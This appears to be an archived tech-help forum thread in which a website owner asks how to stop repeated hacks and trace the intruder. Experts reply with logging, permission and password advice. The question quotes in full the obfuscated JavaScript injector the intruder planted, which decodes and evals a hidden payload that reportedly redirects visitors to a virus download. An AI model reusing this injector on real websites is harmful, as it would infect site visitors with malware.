Solved

Virus on My websites

Posted on 2008-10-12
8
280 Views
Last Modified: 2013-11-22
Someone hacks into my html and php server and he adds this piece of javascript code that it redirects you to a website that downloads virus

<script language=JavaScript>function pbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,24,6,16,62,13,7,17,31,21,0,0,0,0,0,0,40,9,12,1,32,22,5,47,26,38,3,43,28,49,61,57,29,41,19,59,48,11,23,25,51,42,39,0,0,0,0,8,0,14,4,50,53,0,46,45,52,10,18,56,44,30,27,55,54,58,36,37,34,60,33,35,15,2,20);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(253^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}pbn15('ijOrWiQtRS1tLI_taylpOiOr1YgMWiQZ_yAIRIkhi4_sAtWdH6Bsn4_Z3tWoRcAr1yBc_wuXioLoa4@Ze0PsAI1w6UghLIWI3SQrRI_IRI_h82QrmHOhRtWtjZ@hyKgdTcWt9aNwjtkrWE5lLI1sR0_ZRIQr3E5dVSuXb0Bczngp_wBcxKLXHngp8ogtzIWt9yLcaRLo9tAsHEWteKBcPS1tb2AIe0PIzq1w7cAv6xQrRtOoJ6lhzfOwLyAIJK5d')</script><!-- 64.202.163.152 -->

How can i protect my site and how can i track him down ? He has done a lot of damage on our reputation and our clients..

Please help.

0
Comment
Question by:cscg1976
8 Comments
 
LVL 7

Expert Comment

by:myhc
ID: 22700977
Do you have IIS logging setup on your IIS?
0
 
LVL 7

Expert Comment

by:myhc
ID: 22700985
What fire do you have protecting your IIS server, Does that have logging enabled?
0
 

Author Comment

by:cscg1976
ID: 22701315
It's a Linux box. I don't know what is hapenning.
0
 
LVL 7

Expert Comment

by:myhc
ID: 22701360
Please provide Linux details : Model and versions.
Is the firewall part of the box or do you have a hardware firewall?
0
Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

 
LVL 12

Expert Comment

by:lunadl
ID: 22702477
Ping your server to see if it was a DNS attack in stead of a data one. Do you know that he gained access to your machine. Ping from proxies to make sure you are hitting from multiple locations.
0
 

Author Comment

by:cscg1976
ID: 22702796
How can i ping from proxies?
0
 
LVL 20

Accepted Solution

by:
Daniel McAllister earned 500 total points
ID: 22953303
This question SHOULD have been posted to a Linux zone...

The reason you're getting hacked is that your system is likely vulnerable to breakin from a user account with an easy-to-guess username/password combination (like username dan, password dan; or username dan, password password)

If you're getting hacked, then they're logging in as a USER and that USER is modifying your web site contents. The file is successfully modified because WRITE permission exists on the file.

As a FIRST step, set the permissions to "no-write" for all of your website
From a command prompt, probably with root permissions, execute
chmod ugo-w /var/www/html

If you STILL get hacked, then either your ROOT user password is known (or easy to guess), or the "culprit" is the owner of one of those files/folders.

What I've provided here are just rudimentary steps. It's possible, but unlikely, that you've got vulnerabilities in your apache web server, ssh server, or any of the other services you've got turned on. If you're a novice admin, you're probably also logging in directly as root (a VERY bad idea).

Suffice it to say, if you're NEW to Linux Admin and this is a "professional" server (business website(s), email, etc.), then you may want to look into paying a professional to "lock it down" for you.

Good Luck!

Dan
IT4SOHO
0
 
LVL 23

Expert Comment

by:Tiggerito
ID: 23103334
I just found this article that also points to access via a user account

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
0

Featured Post

Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

Join & Write a Comment

In every aspect, security is essential for your business, and for that matter you need to always keep an eye on it. The same can be said about your computer network system too. Your computer network is prone to various malware and security threats t…
SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
This video teaches users how to migrate an existing Wordpress website to a new domain.
Use Wufoo, an online form creation tool, to make powerful forms. Learn how to choose which pages of your form are visible to your users based on their inputs. The page rules feature provides you with an opportunity to create if:then statements for y…

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now